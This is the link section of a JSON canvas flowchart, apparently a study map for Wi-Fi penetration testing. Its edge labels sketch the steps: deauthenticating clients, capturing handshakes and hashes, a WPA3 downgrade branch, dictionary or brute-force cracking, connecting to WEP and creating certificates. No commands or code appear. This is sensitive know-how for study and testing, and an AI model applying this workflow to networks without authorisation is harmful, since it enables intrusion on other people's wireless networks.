		{"id":"7469685b2957c3fd","fromNode":"4f0e60a39024ece2","fromSide":"right","toNode":"037f78ea44866622","toSide":"left"},
		{"id":"4e7dc90e44fa3724","fromNode":"487934e29d837350","fromSide":"right","toNode":"079ad5799beb171d","toSide":"left"},
		{"id":"abf37c7e5343a32a","fromNode":"079ad5799beb171d","fromSide":"right","toNode":"7dcb8ff01aab12f0","toSide":"left"},
		{"id":"cee383d0a4870217","fromNode":"75db123891ff7b7c","fromSide":"top","toNode":"6a5963af14a7fbac","toSide":"left"},
		{"id":"29737c07334a97d3","fromNode":"6aaf8820e36a0032","fromSide":"right","toNode":"6a5963af14a7fbac","toSide":"left"},
		{"id":"99c69261c94f9e46","fromNode":"4079177692ecc68f","fromSide":"bottom","toNode":"f9c571d7694b0a53","toSide":"bottom","label":"No handshake? Deauthenticate again"},
		{"id":"9aa2f86efd2fa366","fromNode":"6a5963af14a7fbac","fromSide":"right","toNode":"6efad66b26e9d7ef","toSide":"left","color":"2"},
		{"id":"e5d100502ca03a39","fromNode":"6a5963af14a7fbac","fromSide":"right","toNode":"d7eac2f12e7eba02","toSide":"left","color":"5"},
		{"id":"54a62d958cc3cdf0","fromNode":"6a5963af14a7fbac","fromSide":"right","toNode":"487934e29d837350","toSide":"left","color":"1"},
		{"id":"3bee825dfe61f105","fromNode":"6a5963af14a7fbac","fromSide":"top","toNode":"d0bb947e7f7aa070","toSide":"left","color":"#d4ff00"},
		{"id":"2dadbae0ec4b98b2","fromNode":"6a5963af14a7fbac","fromSide":"top","toNode":"d58f97ec02810a99","toSide":"left","color":"3"},
		{"id":"ea823991a8c1dd03","fromNode":"bf7bad7e498a24cc","fromSide":"right","toNode":"4bfa087c08e11e3e","toSide":"left","color":"3"},
		{"id":"3f2b0ed0499295b3","fromNode":"7dcb8ff01aab12f0","fromSide":"right","toNode":"9e5b7ab5bcb28017","toSide":"left","color":"1"},
		{"id":"3e40caf870135b2d","fromNode":"9a001e6e2ba7406e","fromSide":"bottom","toNode":"2f8605667a20c18e","toSide":"left","label":"certs exist? Yes"},
		{"id":"29159837ee28cf4e","fromNode":"9a001e6e2ba7406e","fromSide":"bottom","toNode":"d49780b623b2c78f","toSide":"top"},
		{"id":"29b1af8c9f712638","fromNode":"2f8605667a20c18e","fromSide":"top","toNode":"9a001e6e2ba7406e","toSide":"top"},
		{"id":"29b667407ac3c203","fromNode":"d19aeb3b9d513cfe","fromSide":"right","toNode":"74dcaf0b358ecd1c","toSide":"left"},
		{"id":"322b05ada33b8be7","fromNode":"1096fffcf7342824","fromSide":"right","toNode":"4f0e60a39024ece2","toSide":"left"},
		{"id":"6c50ed457cfce2ff","fromNode":"1096fffcf7342824","fromSide":"right","toNode":"f289c0646703d83c","toSide":"left"},
		{"id":"9e35423be41b7c69","fromNode":"5924a09284808ac5","fromSide":"right","toNode":"94240bce1d757502","toSide":"right","label":"No handshake? Deauthenticate again"},
		{"id":"31bd5e9dc9d2a5ca","fromNode":"ad6893ff76f6ea62","fromSide":"right","toNode":"94240bce1d757502","toSide":"left"},
		{"id":"23785174331f62de","fromNode":"94240bce1d757502","fromSide":"bottom","toNode":"5924a09284808ac5","toSide":"top"},
		{"id":"1a9521134c97d058","fromNode":"f289c0646703d83c","fromSide":"bottom","toNode":"ad6893ff76f6ea62","toSide":"left"},
		{"id":"7a1bb32f1a505a73","fromNode":"da36bfcb43373a04","fromSide":"bottom","toNode":"06df5d7d1790399a","toSide":"top"},
		{"id":"43e91f9077b1ddc6","fromNode":"5924a09284808ac5","fromSide":"left","toNode":"4b476c234aa3d85f","toSide":"right","label":"Got a handshake"},
		{"id":"d353e49afbecb8d3","fromNode":"037f78ea44866622","fromSide":"right","toNode":"416446930e2b9456","toSide":"left"},
		{"id":"889abcd7c2230b6d","fromNode":"2fe45cd96837f519","fromSide":"right","toNode":"05d161795fe6a772","toSide":"left"},
		{"id":"0dc525928e8372bf","fromNode":"35eedf648a1ed443","fromSide":"right","toNode":"c50e8f91be4757e1","toSide":"left"},
		{"id":"425655735b595905","fromNode":"c50e8f91be4757e1","fromSide":"right","toNode":"8c79470a695fa1eb","toSide":"left"},
		{"id":"7cc3630a9946e838","fromNode":"8c79470a695fa1eb","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"f2a1f686f9e93a89","fromNode":"f91aea1b719c1c6f","fromSide":"right","toNode":"129107812142ccea","toSide":"left"},
		{"id":"dff20e7e9a8eebbb","fromNode":"129107812142ccea","fromSide":"right","toNode":"b7560323a51207e4","toSide":"left"},
		{"id":"89d5d21987754ea9","fromNode":"05d161795fe6a772","fromSide":"right","toNode":"f91aea1b719c1c6f","toSide":"left"},
		{"id":"320c4f7541a3ee17","fromNode":"b7560323a51207e4","fromSide":"right","toNode":"e0f14766e8b0f769","toSide":"left"},
		{"id":"c679e43288d39785","fromNode":"e0f14766e8b0f769","fromSide":"right","toNode":"535edc6b20bee998","toSide":"left"},
		{"id":"79ed0098cca6a6dd","fromNode":"535edc6b20bee998","fromSide":"right","toNode":"53a31d8ee845ae34","toSide":"left"},
		{"id":"13415cb907edcec8","fromNode":"53a31d8ee845ae34","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"a3c3358530a9e1cb","fromNode":"e1adaf6b622e4090","fromSide":"right","toNode":"417a65f3e5b70c7e","toSide":"left"},
		{"id":"715fffe96f82f28a","fromNode":"9eab65d091ae4eec","fromSide":"right","toNode":"e1adaf6b622e4090","toSide":"left"},
		{"id":"306ea94cc8fa4375","fromNode":"417a65f3e5b70c7e","fromSide":"right","toNode":"7d480355d9fb75c7","toSide":"left"},
		{"id":"6e2026d0aa0f39f6","fromNode":"7d480355d9fb75c7","fromSide":"right","toNode":"34d9cffcb8335edc","toSide":"left"},
		{"id":"12497748cb66ed7f","fromNode":"34d9cffcb8335edc","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"ea0d7d00e0cd89af","fromNode":"9d84b7aac7121d14","fromSide":"right","toNode":"627e0dc50a9fe8a1","toSide":"left"},
		{"id":"93bb72a4c75178c6","fromNode":"627e0dc50a9fe8a1","fromSide":"right","toNode":"dc9f0c60c4a2b6c1","toSide":"left"},
		{"id":"f94f9c5a8bbe3f60","fromNode":"dc9f0c60c4a2b6c1","fromSide":"right","toNode":"50b7dc9afe531d85","toSide":"left"},
		{"id":"63f736c6730d84ab","fromNode":"2fe45cd96837f519","fromSide":"right","toNode":"9d84b7aac7121d14","toSide":"left"},
		{"id":"570f8f05c9bda236","fromNode":"50b7dc9afe531d85","fromSide":"right","toNode":"35eedf648a1ed443","toSide":"left"},
		{"id":"2bd0d3f62426fb00","fromNode":"cfa9b3794f337385","fromSide":"right","toNode":"9eab65d091ae4eec","toSide":"left"},
		{"id":"86b8662acd9f0208","fromNode":"1865825c700458e9","fromSide":"right","toNode":"cfa9b3794f337385","toSide":"left"},
		{"id":"76ee35b43b89b4b1","fromNode":"1865825c700458e9","fromSide":"right","toNode":"c385ef957fb46d3a","toSide":"left"},
		{"id":"a51266a5d2c487d8","fromNode":"fac68ca98d49d6c3","fromSide":"right","toNode":"6bc87e00b0d14c6e","toSide":"left"},
		{"id":"12fbb3850dc8189d","fromNode":"abe11dc3393d09fb","fromSide":"right","toNode":"fac68ca98d49d6c3","toSide":"left"},
		{"id":"776037758cd35d4e","fromNode":"c385ef957fb46d3a","fromSide":"right","toNode":"abe11dc3393d09fb","toSide":"left"},
		{"id":"fd9330c3e00a64e9","fromNode":"6bc87e00b0d14c6e","fromSide":"right","toNode":"a1280c077193d34c","toSide":"left"},
		{"id":"027ee48ee6439fe8","fromNode":"6bc87e00b0d14c6e","fromSide":"right","toNode":"b967c37659b4b8ed","toSide":"left"},
		{"id":"203b872f1bcbb8c1","fromNode":"a1280c077193d34c","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"56897a420266413d","fromNode":"b967c37659b4b8ed","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"4f4267f7f7855d75","fromNode":"e72cc081783ea78d","fromSide":"right","toNode":"ef6bdb1abce19a58","toSide":"left"},
		{"id":"adcaab60b2a334f8","fromNode":"ef6bdb1abce19a58","fromSide":"right","toNode":"454024dd16da6f18","toSide":"left"},
		{"id":"17da3a98ddd780a3","fromNode":"beb628ac40d5d5c7","fromSide":"right","toNode":"e72cc081783ea78d","toSide":"left"},
		{"id":"fc5853ee39b6496a","fromNode":"454024dd16da6f18","fromSide":"right","toNode":"06b70fbca2fa9001","toSide":"left"},
		{"id":"515fb9de540cf57e","fromNode":"06b70fbca2fa9001","fromSide":"bottom","toNode":"3261395807851f33","toSide":"left","label":"YES"},
		{"id":"65311e5038b56066","fromNode":"06b70fbca2fa9001","fromSide":"right","toNode":"cf2d877453327951","toSide":"left","label":"NO"},
		{"id":"373c62b0602af261","fromNode":"3261395807851f33","fromSide":"right","toNode":"cf2d877453327951","toSide":"bottom"},
		{"id":"fd55379a014f9f17","fromNode":"cf2d877453327951","fromSide":"right","toNode":"8c75a937f6fce473","toSide":"left"},
		{"id":"41474c4e385efd84","fromNode":"8c75a937f6fce473","fromSide":"bottom","toNode":"1eeb8cbfffcdf8bf","toSide":"top"},
		{"id":"f513933e8f21a74c","fromNode":"1eeb8cbfffcdf8bf","fromSide":"bottom","toNode":"a200026e27b66b61","toSide":"right","label":"YES"},
		{"id":"0b939b3e649a1f4a","fromNode":"1eeb8cbfffcdf8bf","fromSide":"right","toNode":"f80fbd5ea5ad2ca8","toSide":"left","label":"No client"},
		{"id":"729de47e6560db88","fromNode":"a200026e27b66b61","fromSide":"bottom","toNode":"f80fbd5ea5ad2ca8","toSide":"left"},
		{"id":"d31618eebac4ce25","fromNode":"fabf044ff7ed4f69","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"left","color":"#d4ff00","label":"Connect to WEP"},
		{"id":"f35b36b9fb629b9a","fromNode":"254c757f0bdd3996","fromSide":"top","toNode":"49dbe47d75bd6540","toSide":"left"},
		{"id":"3a9f2a238842764e","fromNode":"49dbe47d75bd6540","fromSide":"right","toNode":"f134832b566fcf3a","toSide":"left","label":"YES"},
		{"id":"6397572853baf4fc","fromNode":"49dbe47d75bd6540","fromSide":"top","toNode":"dd66ff335112c135","toSide":"bottom","label":"NO"},
		{"id":"0f4da8c2067d792e","fromNode":"8b59cf942567044c","fromSide":"right","toNode":"294a46fbb6ab06e6","toSide":"left","label":"YES, everything is working"},
		{"id":"e062faef9e4e094c","fromNode":"8b59cf942567044c","fromSide":"top","toNode":"d3d276d129620a47","toSide":"bottom","color":"#ff5f1f","label":"NO, configure all thins as needed to work"},
		{"id":"91c400efe9c06d4a","fromNode":"bc974c9ff95dc503","fromSide":"right","toNode":"3bdceb08c66ccdc5","toSide":"left"},
		{"id":"2ab26cb696a46a17","fromNode":"3bdceb08c66ccdc5","fromSide":"right","toNode":"060cb367d76523e1","toSide":"left"},
		{"id":"ff99bf46122e7911","fromNode":"019d0c00962c36ec","fromSide":"right","toNode":"b422cfaebe616929","toSide":"left"},
		{"id":"63451f52b60af151","fromNode":"b422cfaebe616929","fromSide":"right","toNode":"3966d18d87f0bb5d","toSide":"left"},
		{"id":"ffb49ba01087e933","fromNode":"a5c2e947783005e7","fromSide":"right","toNode":"019d0c00962c36ec","toSide":"left"},
		{"id":"58cee2860e545794","fromNode":"bc974c9ff95dc503","fromSide":"right","toNode":"b5e1bae809c596f4","toSide":"left"},
		{"id":"31a872a72a8f8fde","fromNode":"b5e1bae809c596f4","fromSide":"right","toNode":"060cb367d76523e1","toSide":"left"},
		{"id":"b36f000faf3bcd86","fromNode":"008cd453c6c99975","fromSide":"right","toNode":"73c06fd47cfc26a8","toSide":"top","color":"#d4ff00","label":"Everything is set back to normal"},
		{"id":"f209485530fc21d1","fromNode":"060cb367d76523e1","fromSide":"right","toNode":"909a676b85d0aca0","toSide":"left"},
		{"id":"08acfc5977a39631","fromNode":"060cb367d76523e1","fromSide":"right","toNode":"35483d7d41d3a04c","toSide":"left"},
		{"id":"65b05bccc9224141","fromNode":"909a676b85d0aca0","fromSide":"right","toNode":"008cd453c6c99975","toSide":"left"},
		{"id":"a7d088fdbeadf520","fromNode":"35483d7d41d3a04c","fromSide":"right","toNode":"008cd453c6c99975","toSide":"left"},
		{"id":"da9f6d3fdcf61d04","fromNode":"e0a373c510efe328","fromSide":"right","toNode":"fe92e5d390ee8e94","toSide":"left"},
		{"id":"5c212c93b7663bd7","fromNode":"fe92e5d390ee8e94","fromSide":"right","toNode":"6a5963af14a7fbac","toSide":"left"},
		{"id":"03589fbbe7dd3f4e","fromNode":"e0a373c510efe328","fromSide":"right","toNode":"32053a38b8cd30e1","toSide":"left"},
		{"id":"fe77053d0ddc7a0c","fromNode":"32053a38b8cd30e1","fromSide":"right","toNode":"6a5963af14a7fbac","toSide":"left"},
		{"id":"73e0b43ae5e33265","fromNode":"060cb367d76523e1","fromSide":"right","toNode":"40b951370a276c76","toSide":"left"},
		{"id":"8248f1ae4f9e9997","fromNode":"40b951370a276c76","fromSide":"right","toNode":"008cd453c6c99975","toSide":"left"},
		{"id":"5b90d10e611c74d2","fromNode":"c2aed276192832bb","fromSide":"right","toNode":"028f4df0ae03f67f","toSide":"left"},
		{"id":"61a0d9a7b75c48a4","fromNode":"028f4df0ae03f67f","fromSide":"right","toNode":"dbf65fb93f7d06c3","toSide":"left"},
		{"id":"6c10b633f08c4e85","fromNode":"179cc2370c83ee40","fromSide":"right","toNode":"a4e95815022088b5","toSide":"left"},
		{"id":"584fdd5be989d9bc","fromNode":"a4e95815022088b5","fromSide":"right","toNode":"83c19b371405b365","toSide":"left"},
		{"id":"fcf64ea8248239e5","fromNode":"4ffeb36b3a406057","fromSide":"right","toNode":"056dde338b02633d","toSide":"bottom"},
		{"id":"3ae4c19bf943182e","fromNode":"311698394745edd7","fromSide":"right","toNode":"04cf4cc33ef9ef33","toSide":"left","color":"#004cff","label":"WPA3 "},
		{"id":"abc31d60f18b1c2f","fromNode":"4bc734617858ee2e","fromSide":"right","toNode":"edf925008e710168","toSide":"left"},
		{"id":"c1f98cacb3d8804f","fromNode":"b799201e55dd29ff","fromSide":"bottom","toNode":"edf925008e710168","toSide":"top"},
		{"id":"e5d49f4d42f5cd26","fromNode":"f604b4dcd3d237cd","fromSide":"right","toNode":"0a176c75cf26e89b","toSide":"left"},
		{"id":"290c8a8ed547afba","fromNode":"294a46fbb6ab06e6","fromSide":"right","toNode":"f604b4dcd3d237cd","toSide":"left"},
		{"id":"a9bfc4a87733ad4d","fromNode":"9b823d72103e2f9b","fromSide":"right","toNode":"3d786318a74cabba","toSide":"left"},
		{"id":"18f426c90bd7ba77","fromNode":"0a176c75cf26e89b","fromSide":"right","toNode":"9b823d72103e2f9b","toSide":"left"},
		{"id":"9f2498860a76fa0d","fromNode":"edf925008e710168","fromSide":"right","toNode":"b6ce6252cf41502c","toSide":"left"},
		{"id":"482f78ad2926980e","fromNode":"83c19b371405b365","fromSide":"right","toNode":"f2761848f3392429","toSide":"right"},
		{"id":"ed927f784f1b91fa","fromNode":"f2761848f3392429","fromSide":"left","toNode":"83c19b371405b365","toSide":"left","label":"No handshake? Deauthenticate again"},
		{"id":"ad13ece9d824ddb6","fromNode":"f2761848f3392429","fromSide":"top","toNode":"6dbae79882b21845","toSide":"left","label":"Got a HASH"},
		{"id":"5fe12abdc5e61581","fromNode":"402d3cbb68792eaa","fromSide":"top","toNode":"0e91a0726353d33a","toSide":"bottom"},
		{"id":"f7ede4b949a1c60f","fromNode":"0e91a0726353d33a","fromSide":"right","toNode":"f2b5c00533fb3f2a","toSide":"left"},
		{"id":"dc568bbd06468c17","fromNode":"f2b5c00533fb3f2a","fromSide":"right","toNode":"fb1e387b4f77d76b","toSide":"left"},
		{"id":"4f664a3467d6696d","fromNode":"3454fa6c990772d6","fromSide":"right","toNode":"75257d3baa5dd46f","toSide":"left"},
		{"id":"4a8857379d1ccf5b","fromNode":"75257d3baa5dd46f","fromSide":"right","toNode":"0e91a0726353d33a","toSide":"left","label":"Yes is 0"},
		{"id":"da15fb152027a8b7","fromNode":"75257d3baa5dd46f","fromSide":"top","toNode":"4bc734617858ee2e","toSide":"bottom","label":"No deauthentication for downgrade is not a possibility. Consider a bruteforce attack"},
		{"id":"f5877699a59ce59d","fromNode":"893b75565d3d7a8d","fromSide":"right","toNode":"f690ccfa62b4134e","toSide":"left"},
		{"id":"69409d5840ff9c41","fromNode":"f690ccfa62b4134e","fromSide":"right","toNode":"3454fa6c990772d6","toSide":"left"},
		{"id":"81197dfe4af1894e","fromNode":"fb1e387b4f77d76b","fromSide":"right","toNode":"c6a15e22d09a7197","toSide":"left","color":"#ff7b00","label":"Got handshake"},
		{"id":"f6fa6c9dc32df61c","fromNode":"b6ce6252cf41502c","fromSide":"right","toNode":"d03bb4b6f6ec7241","toSide":"left","label":"YES"},
		{"id":"ab4c755b9502d124","fromNode":"b6ce6252cf41502c","fromSide":"bottom","toNode":"edf925008e710168","toSide":"bottom","label":"No, consider using another dictionary or another attack if possible"},
		{"id":"193684cd9cc5486a","fromNode":"3d428e9063fde8db","fromSide":"top","toNode":"da36bfcb43373a04","toSide":"top"},
		{"id":"3f2fa85e39b5233d","fromNode":"3d428e9063fde8db","fromSide":"left","toNode":"f162b965d949e052","toSide":"top"},
		{"id":"0ca48517f6e4e266","fromNode":"3d428e9063fde8db","fromSide":"bottom","toNode":"d1005717e3966111","toSide":"top"},
		{"id":"e1f6f01b1877e0db","fromNode":"d1005717e3966111","fromSide":"right","toNode":"ac9350bd6fee7a10","toSide":"top","label":"Input for\nManual action to create certificates"},
		{"id":"2f099314c602aa2f","fromNode":"f162b965d949e052","fromSide":"right","toNode":"ac9350bd6fee7a10","toSide":"top","label":"Input for\nManual action to create certificates"},
		{"id":"c788cb144e7cb9e7","fromNode":"4b476c234aa3d85f","fromSide":"left","toNode":"3d428e9063fde8db","toSide":"right"},
		{"id":"8f000cb7f5484ff8","fromNode":"6a5963af14a7fbac","fromSide":"right","toNode":"311698394745edd7","toSide":"left","color":"#004cff"}
	]
}